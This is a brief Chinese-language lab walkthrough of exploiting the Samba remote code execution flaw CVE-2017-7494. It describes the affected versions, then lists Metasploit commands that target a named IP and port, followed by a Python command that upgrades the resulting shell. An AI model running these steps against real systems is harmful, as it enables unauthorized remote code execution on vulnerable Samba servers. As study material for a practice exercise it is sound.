漏洞介绍
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。属于严重漏洞,可以造成远程代码执行。
Samba实现Windows主机与Linux服务器之间的资源共享,Linux操作系统提供了Samba服务,Samba服务为两种不同的操作系统架起了一座桥梁,使Linux系统和Windows系统之间能够实现互相通信
服务器一般运行着Samba服务在445端口
本案例Samba服务在65249端口
msf
search cve-2017-7494
use 0
info
set rhosts 123.58.224.8
set rport 65249
run
python -c 'import pty;pty.spawn("/bin/bash")'
<